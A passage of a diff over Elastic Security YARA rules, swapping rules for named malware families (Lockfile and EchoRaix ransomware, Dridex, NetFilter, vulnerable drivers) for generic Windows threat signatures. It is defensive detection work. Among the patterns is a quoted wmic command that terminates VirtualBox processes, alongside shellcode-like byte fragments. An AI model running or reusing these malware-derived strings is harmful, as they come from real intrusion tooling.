hash = "937c8bc3c89bb9c05b2cb859c4bf0f47020917a309bbadca36236434c8cdc8b9" + logic_hash = "49a7875fd9c31c5c9b593aed75a28fadb586294422b75c7a8eeba2e8ff254753" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4f14dcca5704c2ef32caaed1c048a5fb14095f31be8630676c07cbc8b22e6c4d" - severity = 100 + fingerprint = "659bdc9af01212de3d2492e0805e801b0a00630bd699360be15d3fe5b221f6b3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 49 89 F0 41 54 55 48 89 CD 53 48 89 FB 48 83 EC 58 48 85 D2 } + $a1 = { 48 81 EC E0 01 00 00 48 89 9C 24 F8 01 00 00 48 83 F9 42 0F 85 03 01 00 00 48 89 84 24 F0 01 00 00 48 89 9C 24 F8 01 00 00 44 0F 11 BC 24 88 01 00 00 44 0F 11 BC 24 90 01 00 00 44 0F 11 BC 24 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Lockfile_74185716 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_61315534 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Lockfile (Windows.Ransomware.Lockfile)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "74185716-e79d-4d63-b6ae-9480f24dcd4f" - date = "2021-08-31" - modified = "2022-01-13" + id = "61315534-9d80-428b-bc56-ff4836ab0c4a" + date = "2024-01-11" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Lockfile.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce" - logic_hash = "e922c2fc9dd52dd0238847a9d48691bea90d028cf680fc3a1a0dbdfef1d8dce3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L974-L992" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "819447ca71080f083b1061ed6e333bd9ef816abd5b0dd0b5e6a58511ab1ce8b9" + logic_hash = "0fdfe3bb6ebdaac4324a45dac8680f00684d0030419f26f3f72ed002bf5a2a34" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "849a0fb5a2e08b2d32db839a7fdbde03a184a48726678e65e7f8452b354a3ca8" - severity = 100 + fingerprint = "e5cff64bc04b271237015154ddeb275453536ffa8cbce60389b6ed37e6478788" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "LOCKFILE-README" - $a2 = "wmic process where \"name like '%virtualbox%'\" call terminate" - $a3 = "" - $a4 = ".lockfile" + $a1 = { 55 8B EC 51 51 8A 4D 08 F6 C1 01 74 0A DB 2D B0 D7 41 00 DB 5D 08 9B F6 C1 08 74 10 9B DF E0 DB 2D B0 D7 41 00 DD 5D F8 9B 9B DF E0 F6 C1 10 74 0A DB 2D BC D7 41 00 DD 5D F8 9B F6 C1 04 74 09 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Atillk_18316Dd9 : FILE +rule ELASTIC_Windows_Generic_Threat_Eab96Cf2 : FILE MEMORY { meta: - description = "Name: atillk64.sys, Version: 5.11.9.0" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "18316dd9-0a58-4e06-bebd-13f3de45c054" - date = "2022-04-04" - modified = "2022-04-04" + id = "eab96cf2-f25a-4149-9328-3f7af50b2ad8" + date = "2024-01-11" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Atillk.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173" - logic_hash = "02d218d0a0ea447e4ad0b03bff50c307ca5f36b8ed268787cd73c88a05aa4214" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L994-L1012" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2be8a2c524f1fb2acb2af92bc56eb9377c4e16923a06f5ac2373811041ea7982" + logic_hash = "cc1dfc2c9c5e1fbc6282342dfbf3a6c834fa56fb6fc46569a24fa78535c5845f" score = 75 quality = 75 - tags = "FILE" - fingerprint = "74d618e50edf662aae13e7577a02cfc54c5a15045b34acdb2f5714ce8c65a487" - threat_name = "Windows.VulnDriver.Atillk" + tags = "FILE, MEMORY" + fingerprint = "a07bbc803aa7ae54d0c0b2b15edf8378646f06906151998ac3d5491245813dd9" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 61 00 74 00 69 00 6C 00 6C 00 6B 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x0b][\x00-\x00])([\x00-\x05][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x09][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0a][\x00-\x00])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0b][\x00-\x00])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x08][\x00-\x00]))/ + $a1 = { 20 41 52 FF E0 58 41 59 5A 48 8B 12 E9 4B FF FF FF 5D 48 31 DB 53 49 BE 77 69 6E 68 74 74 70 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5 53 53 48 89 E1 53 5A 4D 31 C0 4D 31 C9 53 53 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Trojan_Rooter_C8D08D3A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_11A56097 : FILE MEMORY { meta: - description = "Detects Linux Trojan Rooter (Linux.Trojan.Rooter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c8d08d3a-ff9c-4545-9f09-45fbe5b534f3" - date = "2021-04-06" - modified = "2021-09-16" + id = "11a56097-c019-43dc-b401-c3bd5e88ce17" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Rooter.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f55e3aa4d875d8322cdd7caa17aa56e620473fe73c9b5ae0e18da5fbc602a6ba" - logic_hash = "c91f3112cc61acec08ab3cd59bab2ae833ba0d8ac565ffb26a46982f38af0e71" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1014-L1033" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "98d538c8f074d831b7a91e549e78f6549db5d2c53a10dbe82209d15d1c2e9b56" + logic_hash = "42f955c079752c787ac70682bc41fa31f3196d30051d7032276a0d4279d59d58" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "2a09f9fabfefcf44c71ee17b823396991940bedd7a481198683ee3e88979edf4" - severity = 100 + fingerprint = "37fda03cc0d50dc8bf6adfb83369649047e73fe33929f6579bf806b343eb092c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D8 DC 04 08 BB 44 C3 04 08 CD 80 C7 05 48 FB 04 } + $a1 = { 6E 6F 69 74 70 65 63 78 45 74 61 6D 72 6F 46 65 67 61 6D 49 64 61 42 } + $a2 = { 65 74 75 62 69 72 74 74 41 65 74 65 6C 6F 73 62 4F } condition: all of them } -rule ELASTIC_Windows_Trojan_Dridex_63Ddf193 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_F3Bef434 : FILE MEMORY { meta: - description = "Detects Windows Trojan Dridex (Windows.Trojan.Dridex)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "63ddf193-31a6-4139-b452-960fe742da93" - date = "2021-08-07" - modified = "2021-10-04" + id = "f3bef434-0688-4672-a02f-40615cc429b1" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Dridex.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b1d66350978808577159acc7dc7faaa273e82c103487a90bf0d040afa000cb0d" - logic_hash = "e792f4693be0a7c71d1e638212a8fb3acb1e14dedd48218861fad8c09811da29" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1035-L1053" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "98d538c8f074d831b7a91e549e78f6549db5d2c53a10dbe82209d15d1c2e9b56" + logic_hash = "efba0e1fbe6562a9aeaac23b851c31350e4ac6551e505be4986bddade92ca303" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7b4c5fde8e107a67ff22f3012200e56ec452e0a57a49edb2e06ee225ecfe228c" - severity = 90 + fingerprint = "a05dfdf2f8f15335acb2772074ad42f306a4b33ab6a19bdac99a0215820a6f7b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "snxhk.dll" ascii fullword - $a2 = "LondLibruryA" ascii fullword + $a1 = { 6F 70 00 06 EB 72 06 26 0A 00 01 45 6F 04 00 00 8F 7B 02 06 26 0A 00 01 44 6F 70 00 06 D5 72 00 00 00 B8 38 1D 2C EB 2C 1A 00 00 00 B8 38 14 04 00 00 8F 7B 00 00 00 BD 38 32 2C 00 00 00 BE 38 } condition: all of them } -rule ELASTIC_Windows_Trojan_Dridex_C6F01353 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C6F131C5 : FILE MEMORY { meta: - description = "Detects Windows Trojan Dridex (Windows.Trojan.Dridex)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c6f01353-cf55-4eac-9f25-6f9cce3b7990" - date = "2021-08-07" - modified = "2021-10-04" + id = "c6f131c5-8737-4f48-a0fe-a94e9565481e" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Dridex.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "739682ccb54170e435730c54ba9f7e09f32a3473c07d2d18ae669235dcfe84de" - logic_hash = "7146204d779610c04badfc7d884ff882ff5f1439b61f889d1edf4419240c5751" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1055-L1073" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "247314baaaa993b8db9de7ef0e2998030f13b99d6fd0e17ffd59e31a8d17747a" + logic_hash = "5702a77fee0cd564916abdbfedf76d069bb7a5b6de0c4623150991d52dc02e42" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fbdb230032e3655448d26a679afc612c79d33ac827bcd834e54fe5c05f04d828" - severity = 100 + fingerprint = "c4349bd78cdc64430d15caf7efd663ff88d79d69ecf9f8118122b9a85543057d" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 56 57 55 8B FA 85 C9 74 58 85 FF 74 54 0F B7 37 85 F6 75 04 } + $a1 = { 20 48 8B 59 08 8B 13 44 8B 43 04 48 83 C3 08 89 D0 44 09 C0 74 07 E8 B6 FF FF FF EB E8 48 83 C4 20 5B C3 53 45 31 DB BB 0D 00 00 00 48 8B 41 10 45 89 DA 49 C1 E2 04 4A 83 3C 10 00 74 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Netfilter_E8243Dae : FILE +rule ELASTIC_Windows_Generic_Threat_B2A054F8 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "e8243dae-33d9-4b54-8f4a-ba5cf5241767" - date = "2022-04-04" - modified = "2023-06-13" + id = "b2a054f8-160f-4932-b5fe-c7d78a1f9b74" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_NetFilter.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "760be95d4c04b10df89a78414facf91c0961020e80561eee6e2cb94b43b76510" - logic_hash = "c551bd87e73f980d8836b13449490de5e639d768b72d9006d90969f3140b28e2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1075-L1095" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "63d2478a5db820731a48a7ad5a20d7a4deca35c6b865a17de86248bef7a64da7" + logic_hash = "f64b1666f78646322a4c37dc887d8fcfdb275b0bca812e360579cefd9e323c02" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "1542c32471f5d3f20beeb60c696085548d675f5d1cab1a0ef85a7060b01f0349" + quality = 69 + tags = "FILE, MEMORY" + fingerprint = "09f1724963bfdde810b61d80049def388c89f6a21195e90a869bb22d19d074de" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "[NetFlt]:CTRL NDIS ModifyARP" + $a1 = { 7E 38 7E 40 7E 44 48 4C 2A 7E 7E 58 5D 5C } + $a2 = { 39 7B 34 74 26 39 3A 62 3A 66 25 6A } + $a3 = { 5B 50 44 7E 66 7E 71 7E 77 7E 7C 7E } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Netfilter_Dd576D28 : FILE +rule ELASTIC_Windows_Generic_Threat_Fcab7E76 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "dd576d28-b3e7-46b7-b19f-af37af434082" - date = "2022-04-04" - modified = "2023-06-13" + id = "fcab7e76-5edd-4485-9983-bcc5e9cb0a08" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_NetFilter.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88cfe6d7c81d0064045c4198d6ec7d3c50dc3ec8e36e053456ed1b50fc8c23bf" - logic_hash = "7635ed94ca77c7705df4d2a9c5546ece86bf831b5bf5355943419174e0387b86" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1097-L1115" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "67d7e016e401bd5d435eecaa9e8ead341aed2f373a1179069f53b64bda3f1f56" + logic_hash = "90f50d1227b8e462eaa393690dc2b25601444bf80f2108445a0413bff6bedae8" score = 75 quality = 75 - tags = "FILE" - fingerprint = "b47477c371819a456ab24e158d6649e89b4d1756dc6da0b783b351d40b034fac" + tags = "FILE, MEMORY" + fingerprint = "8a01a3a398cfaa00c1b194b2abc5a0c79d21010abf27dffe5eb8fdc602db7ad1" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\NetProxyDriver.pdb" + $a1 = { 28 FA 00 2B CD 65 50 7C FF CF 34 00 80 41 BF 1E 12 1A F9 20 0F 56 EE 9F BA C0 22 7E 97 FC CB 03 C7 67 9A AE 8A 60 C0 B3 6C 0D 00 2B 2C 78 83 B5 88 03 17 3A 51 4A 1F 30 D2 C0 53 DC 09 7A BF 2D } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Netfilter_B4F2A520 : FILE +rule ELASTIC_Windows_Generic_Threat_90E4F085 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b4f2a520-88bf-447e-bbc4-5d8bfd2c9753" - date = "2022-04-04" - modified = "2023-06-13" + id = "90e4f085-2f53-4e5e-bcb6-c24823539241" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_NetFilter.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5d0d5373c5e52c4405f4bd963413e6ef3490b7c4c919ec2d4e3fb92e91f397a0" - logic_hash = "520d2194593f1622a3b905fe182a0773447a4eee3472e7701cce977f5bf4fbae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1117-L1137" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1a6a290d98f5957d00756fc55187c78030de7031544a981fd2bb4cfeae732168" + logic_hash = "2afeae6de965ae155914dcedbfe375327a9fca3b42733c23360dd4fddfcc8a3d" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "1d8da6f78149e2db6b54faa381ce8eb285930226a5b4474e04937893c831809f" + quality = 69 + tags = "FILE, MEMORY" + fingerprint = "1d40eef44166b3cc89b1f2ba9c667032fa44cba271db8b82cc2fed738225712a" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\netfilterdrv.pdb" + $a1 = { 39 39 21 3A 37 3B 45 3C 50 3D 5B 3E 66 3F } + $a2 = { 66 32 33 39 20 3A 4E 3D 72 68 74 76 48 } + $a3 = { 32 78 37 7A 42 5A 4C 22 2A 66 49 7A 75 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Hacktool_Netfilter_1Cae6E26 : FILE +rule ELASTIC_Windows_Generic_Threat_04A9C177 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Netfilter (Windows.Hacktool.NetFilter)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "1cae6e26-b0ce-4f53-b88d-975b52ebcca7" - date = "2022-04-04" - modified = "2023-06-13" + id = "04a9c177-cacf-4509-b8dc-f30a628b7699" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_NetFilter.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e2ec3b2a93c473d88bfdf2deb1969d15ab61737acc1ee8e08234bc5513ee87ea" - logic_hash = "29c0edc03934e6e7275c3870a8808e03ec85dacb1f54e10efca3123d2257db98" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1139-L1157" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0cccdde4dcc8916fb6399c181722eb0da2775d86146ce3cb3fc7f8cf6cd67c29" + logic_hash = "ca7cf71228b1e13ec05c62cd9924ea5089fdf903d8ea4a5151866996ea81e01e" score = 75 quality = 75 - tags = "FILE" - fingerprint = "27003a6c9ad814e1ab2e7e284acfebdd18c9dd2af66eb9f44e5a9d59445fa086" + tags = "FILE, MEMORY" + fingerprint = "b36da73631711de0213658d30d3079f45449c303d8eb87b8342d1bd20120c7bb" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\Driver_Map.pdb" + $a1 = { 6F 81 00 06 FE 3C A3 C3 D6 37 16 00 C2 87 21 EA 80 33 09 E5 00 2C 0F 24 BD 70 BC CB FB 00 94 5E 1B F8 14 F6 E6 95 07 01 CD 02 B0 D7 30 25 65 99 74 01 D6 A4 47 B3 20 AF 27 D8 11 7F 03 57 F6 37 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Vulndriver_Lha_F72Bff9A : FILE +rule ELASTIC_Windows_Generic_Threat_45D1E986 : FILE MEMORY { meta: - description = "Name: LHA.sys" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "f72bff9a-046c-4e02-9e11-4787c8aada75" - date = "2022-04-07" - modified = "2022-04-07" + id = "45d1e986-78fb-4a83-97f6-2b40c657e709" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Lha.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf" - logic_hash = "cea05432b47cf14982bda74476c8c8582068c22fe7dec6468c9756c20412dca2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1159-L1177" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fd159cf2f9bd48b0f6f5958eef8af8feede2bcbbea035a7e56ce1ff72d3f47eb" + logic_hash = "d53a4d189b9a49f9b6477e12bce0d41e62827306d1df79e6494ab67669d84f35" score = 75 quality = 75 - tags = "FILE" - fingerprint = "3b464386a60747131012d8380a34bed9329b02ac5cdc7b69b951f4f681243f35" - threat_name = "Windows.VulnDriver.Lha" + tags = "FILE, MEMORY" + fingerprint = "facb67b78cc4d6cf5d141fd7153d331209e5ce46f29c0078c7e5683165c37057" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4C 00 48 00 41 00 2E 00 73 00 79 00 73 00 00 00 } + $a1 = { 28 45 00 06 00 00 00 08 28 45 00 09 00 00 00 14 28 45 00 09 00 00 00 20 28 45 00 07 00 00 00 28 28 45 00 0A 00 00 00 34 28 45 00 0B 00 00 00 40 28 45 00 09 00 00 00 5B 81 45 00 00 00 00 00 4C } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name + all of them } -rule ELASTIC_Linux_Ransomware_Echoraix_Ea9532Df : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_83C38E63 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Echoraix (Linux.Ransomware.EchoRaix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ea9532df-1136-4b11-bf4f-8838074f4e66" - date = "2023-07-27" - modified = "2024-02-13" + id = "83c38e63-6a18-4def-abf2-35e36210e4cf" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_EchoRaix.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dfe32d97eb48fb2afc295eecfda3196cba5d27ced6217532d119a764071c6297" - logic_hash = "4944f5a2632bfe0abebfa6f658ed3f71e4d97efcb428ed0987e2071dfd66e6a9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1179-L1198" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2121a0e5debcfeedf200d7473030062bc9f5fbd5edfdcd464dfedde272ff1ae7" + logic_hash = "89d4036290a29b372918205bba85698d6343109503766cbb13999b5177fc3152" score = 75 - quality = 73 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "f28b340b99ec2b96ee78da50b3fc455c87dca1e898abf008c16ac192556939c5" - severity = 100 + fingerprint = "9cc8ee8dfa6080a18575a494e0b424154caecedcc8c8fd07dd3c91956c146d1e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 43 58 68 64 4B 74 7A 65 42 59 6C 48 65 58 79 5A 52 62 61 30 2F 6E 65 46 7A 34 49 7A 67 53 38 4C 68 75 36 38 5A 75 4C 4C 52 2F 66 67 6E 72 34 79 54 72 5A 54 6B 43 36 31 62 2D 59 6F 6C 49 2F 32 4C 36 66 53 55 46 52 72 55 70 49 34 6D 4E 53 41 4F 62 5F } + $a1 = { 32 65 65 64 36 35 36 64 64 35 38 65 39 35 30 35 62 34 33 39 35 34 32 30 31 39 36 66 62 33 35 36 } + $a2 = { 34 2A 34 4A 34 52 34 60 34 6F 34 7C 34 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Echoraix_Ee0C719A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Bd24Be68 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Echoraix (Linux.Ransomware.EchoRaix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ee0c719a-1f04-45ff-9e49-38028b138fd0" - date = "2023-07-29" - modified = "2024-02-13" + id = "bd24be68-3d72-44fd-92f2-39f592d47d0e" + date = "2024-01-12" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_EchoRaix.yar#L21-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e711b2d9323582aa390cf34846a2064457ae065c7d2ee1a78f5ed0859b40f9c0" - logic_hash = "3ca12ea0f1794935ea570dda83f33d04ffb19b6664cc1c8b1cbeed59ac04a01a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1200-L1218" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = 